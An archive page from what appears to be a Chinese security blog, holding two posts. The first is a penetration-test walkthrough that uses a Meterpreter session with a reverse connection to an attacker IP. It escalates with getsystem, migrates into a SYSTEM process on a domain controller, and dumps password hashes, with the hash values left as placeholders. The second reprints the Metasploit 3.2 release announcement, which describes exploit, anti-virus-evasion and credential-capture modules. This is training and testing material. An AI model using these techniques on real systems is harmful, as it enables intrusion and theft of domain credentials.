存档

文章标签 ‘Metasploit’

Dumping Hashes on Win2008 R2 x64 with Metasploit

2011年6月13日 没有评论 164 views

When trying to dump password hashes on a Windows 2008 R2 64 bit box I constantly run into the “The parameter is incorrect” error in meterpreter. So I’ve had to fall back on dropping binaries which I really don’t like doing because of the added clean up and chance of getting ‘caught’. Well, with a bit of migration you’ll be back to passing the hash. Here is how, with a bit of the thought process first:

## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##

=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 364 auxiliary - 43 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12622 updated today (2011.05.15)

msf >
[*] DC_IP:49220 Request received for /AYSBk...
[*] DC_IP:49220 Staging connection for target YSBk received...
[*] Patching Target ID YSBk into DLL
[*] DC_IP:49221 Request received for /BYSBk...
[*] DC_IP:49221 Stage connection for target YSBk received...
[*] Meterpreter session 7 opened (ATTACKER_IP:443 -> DC_IP:49221) at Sun May 15 21:37:31 +0000 2011

msf > sessions -i 7
[*] Starting interaction with 7...

meterpreter > sysinfo
System Language : en_US
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Computer : DOMAINCONTROLLE
Architecture : x64 (Current Process is WOW64)
Meterpreter : x86/win32

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x64 0
224 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
324 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
364 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
372 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
404 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
468 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
476 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
484 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
628 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
708 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
804 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
836 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
880 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
932 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
972 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
328 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1172 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1204 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
1252 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfsrs.exe
1288 dns.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dns.exe
1316 ismserv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\ismserv.exe
1360 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1392 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1464 wlms.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wlms\wlms.exe
1492 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfssvc.exe
1572 VMUpgradeHelper.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
1896 TPAutoConnSvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
2016 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
872 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
1268 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
2360 taskhost.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\taskhost.exe
2424 dwm.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\dwm.exe
2452 explorer.exe x64 1 SITTINGDUCK\juser C:\Windows\explorer.exe
2504 TPAutoConnect.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
2512 conhost.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\conhost.exe
2632 VMwareTray.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\VMwareTray.exe
2640 VMwareUser.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\VMwareUser.exe
2716 mmc.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\mmc.exe
3052 mscorsvw.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
2216 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
1932 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
2564 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1732 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
2992 notepad.exe x86 1 SITTINGDUCK\juser C:\Windows\SysWOW64\notepad.exe
1720 notepad.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\notepad.exe

meterpreter > getpid
Current pid: 2992

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Ah, the wonderful ‘The parameter is incorrect’ error. Ok we are an admin since we can see the user for SYSTEM processes, so that isn’t the issue, but lets do a ‘getprivs’ just in case:

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeIncreaseQuotaPrivilege
SeMachineAccountPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeEnableDelegationPrivilege
SeManageVolumePrivilege

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Boo.. Ok, so maybe we have to be ‘SYSTEM’…

meterpreter > getsystem
...got system (via technique 1).

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Still nothing… Maybe it requires that we be in a 64 bit process… PID 1720 was 64 bit version of Notepad, lets try that…

meterpreter > migrate 1720
[*] Migrating to 1720...
[*] Migration completed successfully.

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Damn, what about as ‘SYSTEM’…

meterpreter > getsystem ...got system (via technique 1).

meterpreter > hashdump

[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

No joy.. hmmm What about a ‘SYSTEM’ process that was already there.. ‘dns.exe’ PID 1288 should be good…

meterpreter > migrate 1288
[*] Migrating to 1288...
[*] Migration completed successfully.

meterpreter > hashdump
Administrator:500:MYLMHASH:MYNTLMHASH:::
Guest:501:MYLMHASH:MYNTLMHASH:::
krbtgtG:502:MYLMHASH:MYNTLMHASH:::
Domain Admin?:1000:MYLMHASH:MYNTLMHASH:::
juserN:1104:MYLMHASH:MYNTLMHASH:::
jane.user??:1105:MYLMHASH:MYNTLMHASH:::
DOMAINCONTROLLE$?:1001:MYLMHASH:MYNTLMHASH:::

meterpreter >

分类: 技术文章 标签: ,

Metasploit Framework 3.2 Released 最新版

2008年11月20日 没有评论 357 views

Contact: H D Moore FOR IMMEDIATE RELEASE
Email: hdm[at]metasploit.com


Austin, Texas, November 19th, 2008 -- The Metasploit Project
announced today the free, world-wide availability of version 3.2 of
their exploit development and attack framework. The latest version
is provided under a true open source software license (BSD) and is
backed by a community-based development team.

Metasploit runs on all modern operating systems, including Linux,
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used
on a wide range of hardware platforms, from massive Unix mainframes to
the iPhone. Users can access Metasploit using the tab-completing console
interface, the Gtk GUI, the command line scripting interface, or the
AJAX-enabled web interface. The Windows version of Metasploit includes
all software dependencies and a selection of useful networking tools.

The latest version of the Metasploit Framework, as well as screen
shots, video demonstrations, documentation and installation
instructions for many platforms, can be found online at


- http://metasploit.com/framework/


This release includes a significant number of new features and
capabilities, many of which are highlighted below.

Version 3.2 includes exploit modules for recent Microsoft flaws, such
as MS08-041, MS08-053, MS08-059, MS08-067, MS08-068, and many more.

The module format has been changed in version 3.2. The new format
removes the previous naming and location restrictions and paved the way
to an improved module loading and caching backend. For users, this means
being able to copy a module into nearly any subdirectory and be able to
immediately use it without edits.

The Byakugan WinDBG extension developed by Pusscat has been integrated
with this release, enabling exploit developers to quickly exploit new
vulnerabilities using the best Win32 debugger available today.

The Context-Map payload encoding system development by I)ruid is now
enabled in this release, allowing for any chunk of known process memory to
be used as an encoding key for Windows payloads.

The Incognito token manipulation toolkit, written by Luke Jennings, has
been integrated as a Meterpreter module. This allows an attacker to gain
new privleges through token hopping. The most common use is to hijack
domain admin credentials once remote system access is obtained.

The PcapRub, Scruby, and Packetfu libraries have all been linked into
the Metasploit source tree, allowing easy packet injection and capture.

The METASM pure-Ruby assembler, written by Yoann Guillot and Julien
Tinnes, has gone through a series of updates. The latest version has been
integrated with Metasploit and now supports MIPS assembly and the ability
to compile C code.

The Windows payload stagers have been updated to support targets with
NX CPU support. These stagers now allocate a read/write/exec segment of
memory for all payload downloads and execution.

Executables which have been generated by msfpayload or msfencode now
support NX CPUs. The generated executable is now smaller and more
reliable, opening the door to a wider range of uses. The psexec and
smb_relay modules now use an executable template thats acts like a real
Windows service, improving the reliability and cleanup requirements of
these modules.

The Reflective DLL Injection technique pioneered by Stephen Fewer of
Harmony Security has been integrated into the framework. The new payloads
use the "reflectivedllinjection" stager prefix and share the same binaries
as the older DLL injection method.

Client-side browser exploits now benefit from a set of new javascript
obfuscation techniques developed by Egypt. This improvement leads to a
greater degree of anti-virus bypass for client-side exploits.

Metasploit contains dozens of exploit modules for web browsers and
third-party plugins. The new browser_autopwn module ties many of these
together with advanced fingerprinting techniques to deliver more shells
than most pen-testers know what to do with.

This release includes a set of man-in-the-middle, authentication relay,
and authentication capture modules. These modules can be integrated with
a fake proxy (WPAD), a malicious access point (Karmetasploit), or basic
network traffic interception to gain access to client machines. These
modules tie together browser_autopwn, SMB relaying, and HTTP credential
and form capturing to pillage data from client systems.

Nearly all Metasploit modules now support IPv6 transports. IPv6 stagers
exist for the Windows and Linux platforms, opening the door for penetration
testing of pure IPv6 networks. The VNCInject and Meterpreter payloads have
been extensively tested over IPv6 sockets.

Efrain Torres's WMAP project has been merged into Metasploit. WMAP is
general purpose web application scanning framework that can be automated
through integration with an attack proxy (ratproxy) or be accessed as
individual auxiliary modules.

Egypt's new PHP payloads provide complete bind, reverse, and findsock
support for PHP web application exploits. If you are sick of C99 and R57
and looking to gain a "real" shell from one of the hundreds of RFI flaws
listed on milw0rm, the new PHP payloads work great against multiple
operating systems.

The db_autopwn command has been revamped to support port-based limits,
regex-based module matching, and limits on the number of spawned jobs. The
end result is a way to quickly launch specific modules against a specific
set of target machines. These changes were suggested and implemented by
Marcell 'SkyOut' Dietl (Helith).


Enjoy the release,

hdm mc egypt
pusscat ramon patrickw
I)ruid et kkatterjohn

分类: 资源共享 标签: